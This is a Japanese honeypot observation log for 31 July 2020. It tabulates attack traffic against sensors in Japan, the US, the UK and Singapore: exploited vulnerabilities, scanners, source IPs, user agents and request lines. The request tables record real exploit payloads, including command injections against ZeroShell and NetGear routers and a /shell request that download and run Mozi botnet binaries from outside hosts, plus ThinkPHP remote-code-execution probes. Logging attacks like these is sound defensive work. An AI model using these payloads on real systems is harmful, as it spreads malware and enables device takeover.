ハニーポット(仮) 観測記録 2020/07/31分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
18[.]179[.]20[.]5に関する不正通信
123[.]125[.]114[.]144に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:US
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:UK
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:SG
DrayTek製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//172[.]39[.]116[.]244:45417/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:189 (前日比:+35)
US:総アクセス数:135 (前日比:-98)
UK:総アクセス数:92 (前日比:-30)
SG:総アクセス数:42 (前日比:+3)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.226.72.180 | United States |
1 | 5.188.210.227 | Russia |
1 | 13.234.7.134 | United States |
1 | 15.236.133.241 | United States |
1 | 35.177.70.120 | United States |
8 | 40.83.97.135 | United States |
17 | 44.224.22.196 | United States |
1 | 49.68.193.115 | China |
1 | 59.97.238.207 | India |
1 | 92.63.194.64 | Russia |
1 | 94.20.64.42 | Azerbaijan |
10 | 106.53.30.215 | China |
1 | 112.80.138.119 | China |
1 | 112.80.138.136 | China |
1 | 113.58.244.14 | China |
1 | 113.206.179.187 | China |
1 | 115.205.2.69 | China |
12 | 117.247.145.254 | India |
1 | 121.57.228.208 | China |
1 | 121.57.228.210 | China |
1 | 122.96.29.81 | China |
1 | 122.233.176.142 | China |
1 | 122.233.179.77 | China |
1 | 123.145.39.227 | China |
1 | 124.90.54.44 | China |
1 | 124.235.138.248 | China |
1 | 128.14.134.134 | United States |
1 | 128.14.209.250 | United States |
1 | 150.255.82.171 | China |
1 | 162.243.129.34 | United States |
1 | 171.34.177.96 | China |
1 | 171.118.226.92 | China |
1 | 175.152.29.251 | China |
1 | 175.184.164.49 | China |
1 | 175.184.167.40 | China |
101 | 180.109.166.199 | China |
1 | 185.39.11.105 | Switzerland |
1 | 185.153.196.99 | Russia |
1 | 200.46.45.114 | Panama |
1 | 203.34.152.155 | China |
1 | 210.56.104.165 | India |
1 | 220.200.162.102 | China |
1 | 221.204.149.158 | China |
1 | 222.94.163.21 | China |
1 | 222.186.61.19 | China |
1 | 222.186.61.115 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
34 | - |
7 | AWS Security Scanner |
4 | Go-http-client/1.1 |
1 | Hello, World |
1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488) |
13 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.01717655 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 |
8 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
2 | XTC |
4 | curl/7.47.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
5 | \x16\x03\x01 | ||
5 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
2 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
2 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
2 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
2 | CONNECT | www[.]ipip[.]net/:443 | HTTP/1.1 |
2 | CONNECT | www[.]voanews[.]com/:443 | HTTP/1.1 |
1 | GET | /.s3cfg | HTTP/1.1 |
1 | GET | /Public/home/appjs/Index.js | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
14 | GET | /admin/login.asp | HTTP/1.1 |
8 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
3 | GET | /config.php | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
2 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /solr/ | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /webfig/ | HTTP/1.1 |
1 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
1 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
1 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
2 | GET | http[:]//boxun[.]com/ | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
2 | GET | http[:]//www[.]123cha[.]com/ | HTTP/1.1 |
2 | GET | http[:]//www[.]epochtimes[.]com/ | HTTP/1.1 |
2 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
2 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
2 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
2 | HEAD | http[:]//123[.]125[.]114[.]144/ | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
10 | 42.159.85.3 | China |
1 | 45.141.84.124 | Russia |
1 | 50.192.43.149 | United States |
2 | 80.82.68.68 | Netherlands |
101 | 114.233.153.201 | China |
2 | 118.193.31.180 | Hong Kong |
1 | 122.103.135.235 | Japan |
4 | 124.156.50.149 | Singapore |
1 | 128.14.209.178 | United States |
2 | 143.92.32.86 | Singapore |
1 | 175.3.167.77 | China |
1 | 185.39.11.105 | Switzerland |
1 | 192.241.236.149 | United States |
7 | 195.54.160.21 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | polaris botnet |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
2 | \x16\x03 | ||
2 | \x16\x03\x01 | ||
1 | CONNECT | g[.]alicdn[.]com/:443 | HTTP/1.1 |
1 | CONNECT | sm[.]bdimg[.]com/:443 | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /tools.cgi | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /web/ktping.cmd | HTTP/1.1 |
1 | GET | /webadmin/script?command= | busybox|HTTP/1.1 |
1 | GET | /webfig/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 49.49.247.48 | Thailand |
1 | 91.234.62.26 | Russia |
1 | 92.63.194.64 | Russia |
64 | 123.172.171.128 | China |
1 | 128.14.133.58 | United States |
3 | 132.145.145.227 | United States |
4 | 143.92.32.86 | Singapore |
6 | 143.92.32.106 | Singapore |
1 | 149.129.50.37 | Singapore |
1 | 162.243.128.129 | United States |
1 | 185.39.11.105 | Switzerland |
7 | 195.54.160.21 | Russia |
1 | 222.186.61.115 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
2 | Go-http-client/1.1 |
64 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
3 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
4 | CONNECT | g[.]alicdn[.]com/:443 | HTTP/1.1 |
3 | CONNECT | httpbin[.]org/:443 | HTTP/1.1 |
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
3 | CONNECT | sm[.]bdimg[.]com/:443 | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /nmaplowercheck1596087505 | HTTP/1.1 |
64 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /solr/ | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]proxylists[.]net/proxyjudge.php | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.226.72.180 | United States |
1 | 5.188.210.227 | Russia |
1 | 13.235.99.41 | United States |
1 | 15.236.133.241 | United States |
3 | 36.5.187.101 | China |
5 | 47.197.212.106 | United States |
1 | 49.112.27.80 | China |
10 | 49.233.67.125 | China |
1 | 51.143.98.83 | United Kingdom |
1 | 61.219.11.153 | Taiwan |
1 | 78.157.22.117 | North Macedonia |
1 | 92.63.194.64 | Russia |
1 | 128.14.209.226 | United States |
3 | 150.255.5.173 | China |
1 | 159.18.94.65 | Canada |
1 | 178.32.125.162 | France |
1 | 185.39.11.105 | Switzerland |
1 | 185.153.196.99 | Russia |
1 | 192.241.234.235 | United States |
1 | 193.118.53.194 | Germany |
1 | 195.54.161.67 | Russia |
1 | 210.186.154.100 | Malaysia |
1 | 219.143.174.4 | China |
1 | 222.186.61.115 | China |
1 | 222.247.8.125 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
3 | Go-http-client/1.1 |
1 | Hello, world |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729) |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
2 | curl/7.47.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | - | ||
3 | \x03 | ||
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
1 | GET | /FHFactoryCheck.html | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
2 | GET | /config.php | HTTP/1.1 |
1 | GET | /currentsetting.htm | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.html | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /login.htm | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /scgi-bin/platform.cgi | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//172[.]39[.]116[.]244:45417/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/ | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /webaccess/index.php | HTTP/1.1 |
1 | GET | /webfig/ | HTTP/1.1 |
1 | GET | /webpages/login.html | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
1 | GET | http[:]//example[.]com/ | HTTP/1.1 |
2 | GET | http[:]//httpheader[.]net/azenv.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | HEAD | /qRd6 | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | OPTIONS | * | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |